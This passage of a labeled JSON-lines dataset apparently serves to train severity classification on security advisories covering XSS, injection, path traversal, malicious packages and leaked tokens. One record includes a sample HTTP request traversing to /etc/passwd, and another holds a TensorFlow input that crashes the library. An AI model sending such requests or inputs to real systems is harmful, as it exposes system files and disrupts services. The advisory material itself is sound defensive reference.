overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.", "text_raw": "Cross-Site Scripting via SVG media files\n\n[Severity: HIGH]\n\n### Impact\nCross-Site Scripting via SVG media files\n\n### Patches\nWe recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-23", "split": "train"} -{"id": "e10631c1abc600906077", "text": "Insecure Comparison in secure-compare\n\nVersions of `secure-compare` prior to 3.0.1 are affected by a vulnerability that results in the package always returning true when comparing two strings of the same length, despite differences in the contents of those strings.\n\n## Recommendation\n\nUpgrade to version 3.0.1 or later.", "text_raw": "Insecure Comparison in secure-compare\n\n[Severity: HIGH]\n\nVersions of `secure-compare` prior to 3.0.1 are affected by a vulnerability that results in the package always returning true when comparing two strings of the same length, despite differences in the contents of those strings.\n\n\n## Recommendation\n\nUpgrade to version 3.0.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-06-03", "split": "train"} -{"id": "e6ad5277ca853a289748", "text": "Malicious Package in fuffer-xor\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "text_raw": "Malicious Package in fuffer-xor\n\n[Severity: CRITICAL]\n\nVersion 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.\n\n\n## Recommendation\n\nRemove the package from your environment. Ensure no Ethereum funds were compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "ce1e42c97d63374e06ff", "text": "Command injection in kill-process-on-port\n\nAll versions of package kill-process-on-port are vulnerable to Command Injection via a.getProcessPortId.", "text_raw": "Command injection in kill-process-on-port\n\n[Severity: HIGH]\n\nAll versions of package kill-process-on-port are vulnerable to Command Injection via a.getProcessPortId.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-19", "split": "train"} -{"id": "4e52a414c6f4ced0922c", "text": "NoSQL injection in express-cart\n\nVersions of `express-cart` before 1.1.8 are vulnerable to NoSQL injection.\n\nThe vulnerability is caused by the lack of user input sanitization in the login handlers. In both cases, the customer login and the admin login, parameters from the JSON body are sent directly into the MongoDB query which allows to insert operators.\n\nThese operators can be used to extract the value of the field blindly in the same manner of a blind SQL injection. In this case, the `$regex` operator is used to guess each character of the token from the start.\n\n## Recommendation\n\nUpdate to version 1.1.8 or later.", "text_raw": "NoSQL injection in express-cart\n\n[Severity: HIGH]\n\nVersions of `express-cart` before 1.1.8 are vulnerable to NoSQL injection. \n\nThe vulnerability is caused by the lack of user input sanitization in the login handlers. In both cases, the customer login and the admin login, parameters from the JSON body are sent directly into the MongoDB query which allows to insert operators. \n\nThese operators can be used to extract the value of the field blindly in the same manner of a blind SQL injection. In this case, the `$regex` operator is used to guess each character of the token from the start.\n\n\n## Recommendation\n\nUpdate to version 1.1.8 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "4efcf93075cfc655564b", "text": "Path traversal in Grafana Loki\n\nAn issue was discovered in Grafana Loki through 2.2.1. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Loki will attempt to parse a rules file at that location and include some of the contents in the error message.", "text_raw": "Path traversal in Grafana Loki\n\n[Severity: MEDIUM]\n\nAn issue was discovered in Grafana Loki through 2.2.1. The header value X-Scope-OrgID is used to construct file paths for rules files, and if crafted to conduct directory traversal such as ae ../../sensitive/path/in/deployment pathname, then Loki will attempt to parse a rules file at that location and include some of the contents in the error message.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-02", "split": "train"} -{"id": "40269267a2dddf005390", "text": "Local API Login Credentials Disclosure in paratrooper-pingdom\n\nThe paratrooper-pingdom gem 1.0.0 for Ruby allows local users to obtain the App-Key, username, and password values by listing the curl process.\n\n### Vulnerable Code:\n\nFrom: `paratrooper-pingdom-1.0.0/lib/paratrooper-pingdom.rb`\n\n```ruby\ndef setup(options = {})\n %x[curl https://api.pingdom.com/api/2.0/checks -X PUT -d \"paused=true\" -H \"App-Key: #{app_key}\" -u \"#{username}:#{password}\"] \nend\n\ndef teardown(options = {})\n %x[curl https://api.pingdom.com/api/2.0/checks -X PUT -d \"paused=false\" -H \"App-Key: #{app_key}\" -u \"#{username}:#{password}\"] \nend\n```\n\nA malicious user could monitor the process tree to steal the API key, username and password for the API login.", "text_raw": "Local API Login Credentials Disclosure in paratrooper-pingdom\n\n[Severity: LOW]\n\nThe paratrooper-pingdom gem 1.0.0 for Ruby allows local users to obtain the App-Key, username, and password values by listing the curl process.\n\n### Vulnerable Code:\n\nFrom: `paratrooper-pingdom-1.0.0/lib/paratrooper-pingdom.rb`\n\n```ruby\ndef setup(options = {})\n %x[curl https://api.pingdom.com/api/2.0/checks -X PUT -d \"paused=true\" -H \"App-Key: #{app_key}\" -u \"#{username}:#{password}\"] \nend\n\ndef teardown(options = {})\n %x[curl https://api.pingdom.com/api/2.0/checks -X PUT -d \"paused=false\" -H \"App-Key: #{app_key}\" -u \"#{username}:#{password}\"] \nend\n```\n\nA malicious user could monitor the process tree to steal the API key, username and password for the API login.\n", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "bdf20f091b2b1dbf51a3", "text": "Path Traversal in MHolt Archiver\n\nAll versions of archiver allow attacker to perform a Zip Slip attack via the \"unarchive\" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\n### Specific Go Packages Affected\ngithub.com/mholt/archiver/cmd/arc", "text_raw": "Path Traversal in MHolt Archiver\n\n[Severity: MEDIUM]\n\nAll versions of archiver allow attacker to perform a Zip Slip attack via the \"unarchive\" functions. It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\n### Specific Go Packages Affected\ngithub.com/mholt/archiver/cmd/arc", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "08da2e143c130f188162", "text": "Improper Input Validation (RCE)\n\nWazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.", "text_raw": "Improper Input Validation (RCE)\n\n[Severity: HIGH]\n\nWazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-18", "split": "train"} -{"id": "535156454879d4c00640", "text": "GitHub personal access token leaking into temporary EasyBuild (debug) logs\n\n### Impact\n\nThe GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--from-pr`, etc.) is shown in plain text in EasyBuild debug log files.\n\nScope:\n\n* the log message only appears in the top-level log file, *not* in the individual software installation logs (see https://easybuild.readthedocs.io/en/latest/Logfiles.html);\n - as a consequence, tokens are *not* included in the partial log files that are uploaded into a gist when using `--upload-test-report` in combination with `--from-pr`, nor in the installation logs that are copied to the software installation directories;\n* the message is only logged when using `--debug`, so it will not appear when using the default EasyBuild configuration (only info messages are logged by default);\n* the log message is triggered via `--from-pr`, but also via various other GitHub integration options like `--new-pr`, `--merge-pr`, `--close-pr`, etc., but usually only appears in the temporary log file that is cleaned up automatically as soon as eb completes successfully;\n* you may have several debug log files that include your GitHub token in `/tmp` (or a different location if you've set the `--tmpdir` EasyBuild configuration option) on the systems where you use EasyBuild, but they are located in a subdirectory that is only accessible to your account (permissions set to 700);\n* the only way that a log file that may include your token could have been made public is *if you shared it yourself*, for example by copying the contents of the log file into a gist manually, or by sending a log file to someone;\n* for log files uploaded to GitHub, your token would be revoked automatically when GitHub notices it;\n\n### Patches\n\nThe issue is fixed with the changes in https://github.com/easybuilders/easybuild-framework/pull/3248.\n\nThis fix is included in EasyBuild v4.1.2 (released on Mon Mar 16th 2020), and in the `master`+ `develop` branches of the `easybuild-framework` repository since Mon Mar 16th 2020 (see https://github.com/easybuilders/easybuild-framework/pull/3248 and https://github.com/easybuilders/easybuild-framework/pull/3249 resp.).\n\n**Make sure you revoke the existing GitHub tokens you're using with EasyBuild** (via https://github.com/settings/tokens), and install new ones using \"`eb --install-github-token --force`\" (see also https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html#installing-a-github-token-install-github-token).\n\n### Workarounds\n\n* avoid using the GitHub integration features (see https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html) with EasyBuild versions older than version 4.1.2;\n* don't share top-level EasyBuild (debug) log files with others, unless you are sure your GitHub token is not included in them;\n* clean up temporary EasyBuild log files in `/tmp`on the system(s) where you`re using EasyBuild\n\n### References\n\n* https://github.com/easybuilders/easybuild-framework/pull/3248 (PR that fixes the issue)\n* (release announcement to EasyBuild mailing list)\n\n### For more information\n\n* Open an issue in [the `easybuild-framework` repository](https://github.com/easybuilders/easybuild-framework)\n* Email us at [easybuild-admin@lists.ugent.be](mailto:easybuild-admin@lists.ugent.be)", "text_raw": "GitHub personal access token leaking into temporary EasyBuild (debug) logs\n\n[Severity: CRITICAL]\n\n### Impact\n\nThe GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like `--new-pr`, `--from-pr`, etc.) is shown in plain text in EasyBuild debug log files.\n\nScope:\n\n* the log message only appears in the top-level log file, *not* in the individual software installation logs (see https://easybuild.readthedocs.io/en/latest/Logfiles.html);\n - as a consequence, tokens are *not* included in the partial log files that are uploaded into a gist when using `--upload-test-report` in combination with `--from-pr`, nor in the installation logs that are copied to the software installation directories;\n* the message is only logged when using `--debug`, so it will not appear when using the default EasyBuild configuration (only info messages are logged by default);\n* the log message is triggered via `--from-pr`, but also via various other GitHub integration options like `--new-pr`, `--merge-pr`, `--close-pr`, etc., but usually only appears in the temporary log file that is cleaned up automatically as soon as eb completes successfully;\n* you may have several debug log files that include your GitHub token in `/tmp` (or a different location if you've set the `--tmpdir` EasyBuild configuration option) on the systems where you use EasyBuild, but they are located in a subdirectory that is only accessible to your account (permissions set to 700);\n* the only way that a log file that may include your token could have been made public is *if you shared it yourself*, for example by copying the contents of the log file into a gist manually, or by sending a log file to someone;\n* for log files uploaded to GitHub, your token would be revoked automatically when GitHub notices it;\n\n### Patches\n\nThe issue is fixed with the changes in https://github.com/easybuilders/easybuild-framework/pull/3248.\n\nThis fix is included in EasyBuild v4.1.2 (released on Mon Mar 16th 2020), and in the `master`+ `develop` branches of the `easybuild-framework` repository since Mon Mar 16th 2020 (see https://github.com/easybuilders/easybuild-framework/pull/3248 and https://github.com/easybuilders/easybuild-framework/pull/3249 resp.).\n\n**Make sure you revoke the existing GitHub tokens you're using with EasyBuild** (via https://github.com/settings/tokens), and install new ones using \"`eb --install-github-token --force`\" (see also https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html#installing-a-github-token-install-github-token).\n\n### Workarounds\n\n* avoid using the GitHub integration features (see https://easybuild.readthedocs.io/en/latest/Integration_with_GitHub.html) with EasyBuild versions older than version 4.1.2;\n* don't share top-level EasyBuild (debug) log files with others, unless you are sure your GitHub token is not included in them;\n* clean up temporary EasyBuild log files in `/tmp`on the system(s) where you`re using EasyBuild\n\n### References\n\n* https://github.com/easybuilders/easybuild-framework/pull/3248 (PR that fixes the issue)\n* (release announcement to EasyBuild mailing list)\n\n### For more information\n\n* Open an issue in [the `easybuild-framework` repository](https://github.com/easybuilders/easybuild-framework)\n* Email us at [easybuild-admin@lists.ugent.be](mailto:easybuild-admin@lists.ugent.be)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-03-19", "split": "train"} -{"id": "df8694a5e56edd239c08", "text": "Cross-site scripting in SimpleSAMLphp\n\n### Background\n\nSimpleSAMLphp allows users to report errors and failures to the system administrators via a web form. This web form gathers some contextual information automatically, but it also allows the user to provide their email address for follow-ups and a free-text explanation of what happened. Once submitted, the report is sent as an email to the administrative email address configured in the software.\n\n### Description\n\nThe `www/erroreport.php` script allows error reports to be submitted and sent to the system administrator. Starting with SimpleSAMLphp 1.18.0, a new `SimpleSAML\\Utils\\EMail` class was introduced to handle sending emails, implemented as a wrapper of an external dependency.\n\nThis new wrapper allows us to use Twig templates in order to create the email sent with an error report. Since Twig provides automatic escaping of variables, manual escaping of the free-text field in `www/errorreport.php` was removed to avoid double escaping. However, for those not using the new user interface yet, an email template is hardcoded into the class itself in plain PHP. Since no escaping is provided in this template, it is then possible to inject HTML inside the template by manually crafting the contents of the free-text field.\n\n### Affected versions\n\nSimpleSAMLphp versions 1.18.0 to 1.18.3, both inclusive.\n\n### Impact\n\nAn attacker may take advantage of this issue to manually craft a modified email sent via the error reporting mechanism, such as this email might trick a system administrator into performing an action, such as introducing their credentials into a phishing web site that resembles the original.\n\nRemote execution of javascript code is considered unfeasible since email clients do not run javascript present in emails, although there might be email clients which don't follow this rule, making the attack surface grow.\n\n### Resolution\n\nUpgrade the SimpleSAMLphp installation to version 1.18.4.\n\n### Credit\n\nThis vulnerability was discovered and reported by Frederic Vleminckx.", "text_raw": "Cross-site scripting in SimpleSAMLphp\n\n[Severity: LOW]\n\n### Background\n\nSimpleSAMLphp allows users to report errors and failures to the system administrators via a web form. This web form gathers some contextual information automatically, but it also allows the user to provide their email address for follow-ups and a free-text explanation of what happened. Once submitted, the report is sent as an email to the administrative email address configured in the software.\n\n### Description\n\nThe `www/erroreport.php` script allows error reports to be submitted and sent to the system administrator. Starting with SimpleSAMLphp 1.18.0, a new `SimpleSAML\\Utils\\EMail` class was introduced to handle sending emails, implemented as a wrapper of an external dependency.\n\nThis new wrapper allows us to use Twig templates in order to create the email sent with an error report. Since Twig provides automatic escaping of variables, manual escaping of the free-text field in `www/errorreport.php` was removed to avoid double escaping. However, for those not using the new user interface yet, an email template is hardcoded into the class itself in plain PHP. Since no escaping is provided in this template, it is then possible to inject HTML inside the template by manually crafting the contents of the free-text field.\n\n### Affected versions\n\nSimpleSAMLphp versions 1.18.0 to 1.18.3, both inclusive.\n\n### Impact\n\nAn attacker may take advantage of this issue to manually craft a modified email sent via the error reporting mechanism, such as this email might trick a system administrator into performing an action, such as introducing their credentials into a phishing web site that resembles the original.\n\nRemote execution of javascript code is considered unfeasible since email clients do not run javascript present in emails, although there might be email clients which don't follow this rule, making the attack surface grow.\n\n### Resolution\n\nUpgrade the SimpleSAMLphp installation to version 1.18.4.\n\n### Credit\n\nThis vulnerability was discovered and reported by Frederic Vleminckx.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-01-24", "split": "train"} -{"id": "28ebfe75d653283a18f6", "text": "Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability\n\nAffected: Cisco Adaptive Security Appliance (ASA)\n\nCisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability\n\nAffected: Cisco Adaptive Security Appliance (ASA)\n\nCisco Adaptive Security Appliance (ASA) contains an improper input validation vulnerability with HTTP URLs. Exploitation could allow an attacker to cause a denial-of-service (DoS) condition or information disclosure.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "ec6655ca94ebdd1b2331", "text": "Withdrawn, accidental duplicate publish.\n\nCross-site scripting (XSS) vulnerability in Ember.js 1.8.x through 1.10.x, 1.11.x before 1.11.4, 1.12.x before 1.12.2, 1.13.x before 1.13.12, 2.0.x before 2.0.3, 2.1.x before 2.1.2, and 2.2.x before 2.2.1 allows remote attackers to inject arbitrary web script or HTML.", "text_raw": "Moderate severity vulnerability that affects ember\n\n[Severity: MEDIUM]\n\nWithdrawn, accidental duplicate publish.\r\n\r\nCross-site scripting (XSS) vulnerability in Ember.js 1.8.x through 1.10.x, 1.11.x before 1.11.4, 1.12.x before 1.12.2, 1.13.x before 1.13.12, 2.0.x before 2.0.3, 2.1.x before 2.1.2, and 2.2.x before 2.2.1 allows remote attackers to inject arbitrary web script or HTML.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "060ec4b465ce5d9047f3", "text": "Segfault in SparseCountSparseOutput\n\n### Impact\nSpecifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput` results in a segmentation fault being thrown out from the standard library as `std::vector` invariants are broken.\n\n```python\nimport tensorflow as tf\n\nindices = tf.constant([], shape=[0, 0], dtype=tf.int64)\nvalues = tf.constant([], shape=[0, 0], dtype=tf.int64)\ndense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64)\nweights = tf.constant([], shape=[0, 0], dtype=tf.int64)\n\ntf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213) assumes the first element of the dense shape is always positive and uses it to initialize a `BatchedMap` (i.e., [`std::vector>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27)) data structure.\n\n```cc\n bool is_1d = shape.NumElements() == 1;\n int num_batches = is_1d ? 1 : shape.flat()(0);\n ...\n auto per_batch_counts = BatchedMap(num_batches); \n```\n\nIf the `shape` tensor has more than one element, `num_batches` is the first value in `shape`.\n\nEnsuring that the `dense_shape` argument is a valid tensor shape (that is, all elements are non-negative) solves this issue.\n\n### Patches\nWe have patched the issue in GitHub commit [c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "text_raw": "Segfault in SparseCountSparseOutput\n\n[Severity: LOW]\n\n### Impact\nSpecifying a negative dense shape in `tf.raw_ops.SparseCountSparseOutput` results in a segmentation fault being thrown out from the standard library as `std::vector` invariants are broken.\n\n```python\nimport tensorflow as tf\n\nindices = tf.constant([], shape=[0, 0], dtype=tf.int64)\nvalues = tf.constant([], shape=[0, 0], dtype=tf.int64)\ndense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64)\nweights = tf.constant([], shape=[0, 0], dtype=tf.int64)\n\ntf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)\n```\n\nThis is because the [implementation](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L199-L213) assumes the first element of the dense shape is always positive and uses it to initialize a `BatchedMap` (i.e., [`std::vector>`](https://github.com/tensorflow/tensorflow/blob/8f7b60ee8c0206a2c99802e3a4d1bb55d2bc0624/tensorflow/core/kernels/count_ops.cc#L27)) data structure.\n\n```cc\n bool is_1d = shape.NumElements() == 1;\n int num_batches = is_1d ? 1 : shape.flat()(0);\n ...\n auto per_batch_counts = BatchedMap(num_batches); \n```\n\nIf the `shape` tensor has more than one element, `num_batches` is the first value in `shape`.\n \nEnsuring that the `dense_shape` argument is a valid tensor shape (that is, all elements are non-negative) solves this issue.\n\n### Patches\nWe have patched the issue in GitHub commit [c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5](https://github.com/tensorflow/tensorflow/commit/c57c0b9f3a4f8684f3489dd9a9ec627ad8b599f5).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 and TensorFlow 2.3.3.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "e54bf640c17b1ae1ded8", "text": "KevinLAB BEMS 1.0 Authenticated File Path Traversal Information Disclosure", "text_raw": "KevinLAB BEMS 1.0 Authenticated File Path Traversal Information Disclosure\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2021-07-20", "split": "train"} -{"id": "45bce113143032cf2efd", "text": "Sensitive Data Exposure in msrcrypto\n\nVersions of `msrcrypto` prior to 1.4.1 are vulnerable to Sensitive Data Exposure. The package's Elliptic Curve Cryptography (ECC) implementation may leak information about a server's private ECC key. It can also allow attackers to craft invalid ECDSA signatures that pass as valid. There is no published proof-of-concept for this vulnerability.\n\n## Recommendation\n\nUpgrade to version 1.4.1 or later.", "text_raw": "Sensitive Data Exposure in msrcrypto\n\n[Severity: CRITICAL]\n\nVersions of `msrcrypto` prior to 1.4.1 are vulnerable to Sensitive Data Exposure. The package's Elliptic Curve Cryptography (ECC) implementation may leak information about a server's private ECC key. It can also allow attackers to craft invalid ECDSA signatures that pass as valid. There is no published proof-of-concept for this vulnerability.\n\n\n## Recommendation\n\nUpgrade to version 1.4.1 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-09-10", "split": "train"} -{"id": "b7bf923be6cd5109ce94", "text": "keycloak Self Stored Cross-site Scripting vulnerability\n\nA flaw was found in keycloak in versions before 13.0.0. A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "text_raw": "keycloak Self Stored Cross-site Scripting vulnerability\n\n[Severity: CRITICAL]\n\nA flaw was found in keycloak in versions before 13.0.0. A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "5256027ec9b42b55cf0f", "text": "Malicious Package in ecruve\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in ecruve\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "4a2f1802b09c2e9836fc", "text": "Policies not properly enforced in OWASP Java HTML Sanitizer\n\nThe OWASP Java HTML Sanitizer before 20211018.1 does not properly enforce policies associated with the `SELECT`, `STYLE`, and `OPTION` elements.", "text_raw": "Policies not properly enforced in OWASP Java HTML Sanitizer\n\n[Severity: CRITICAL]\n\nThe OWASP Java HTML Sanitizer before 20211018.1 does not properly enforce policies associated with the `SELECT`, `STYLE`, and `OPTION` elements.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-10-19", "split": "train"} -{"id": "5805195030e82c8a4cfb", "text": "Cross-site Scripting in github.com/schollz/rwtxt\n\nCross-site scripting vulnerability in rwtxt versions prior to v1.8.6 allows a remote attacker to inject an arbitrary script via unspecified vectors.", "text_raw": "Cross-site Scripting in github.com/schollz/rwtxt\n\n[Severity: MEDIUM]\n\nCross-site scripting vulnerability in rwtxt versions prior to v1.8.6 allows a remote attacker to inject an arbitrary script via unspecified vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-29", "split": "train"} -{"id": "cdcdaacd4eb77c170be1", "text": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat\n\nWhen responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat\n\n[Severity: HIGH]\n\nWhen responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "61daa4cffe99e5742a0e", "text": "Double free in through\n\nAn issue was discovered in the through crate through 2021-02-18 for Rust. There is a double free (in through and through_and) upon a panic of the map function.", "text_raw": "Double free in through\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the through crate through 2021-02-18 for Rust. There is a double free (in through and through_and) upon a panic of the map function.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "c506fa703d19197791a3", "text": "DLL Injection in kerberos\n\nVersion of `kerberos` prior to 1.0.0 are vulnerable to DLL Injection. The package loads DLLs without specifying a full path. This may allow attackers to create a file with the same name in a folder that precedes the intended file in the DLL path search. Doing so would allow attackers to execute arbitrary code in the machine.\n\n## Recommendation\n\nUpgrade to version 1.0.0 or later.", "text_raw": "DLL Injection in kerberos\n\n[Severity: HIGH]\n\nVersion of `kerberos` prior to 1.0.0 are vulnerable to DLL Injection. The package loads DLLs without specifying a full path. This may allow attackers to create a file with the same name in a folder that precedes the intended file in the DLL path search. Doing so would allow attackers to execute arbitrary code in the machine.\n\n\n## Recommendation\n\nUpgrade to version 1.0.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "12c98937ab1e3f3d7b17", "text": "Directory Traversal in uv-tj-demo\n\nAffected versions of `uv-tj-demo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in uv-tj-demo\n\n[Severity: HIGH]\n\nAffected versions of `uv-tj-demo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "9f3add4a51c45e9d3704", "text": "Potential Zip Slip Vulnerability in baserCMS\n\nThere is a OS Command Injection Vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\nTarget\nbaserCMS 4.5.3 and earlier versions\n\nVulnerability\nOS Command Injection Vulnerability.\n\nCountermeasures\nUpdate to the latest version of baserCMS\n\nCredits\nDaniele Scanu @SoterItSecurity", "text_raw": "Potential Zip Slip Vulnerability in baserCMS\n\n[Severity: HIGH]\n\nThere is a OS Command Injection Vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\nTarget\nbaserCMS 4.5.3 and earlier versions\n\nVulnerability\nOS Command Injection 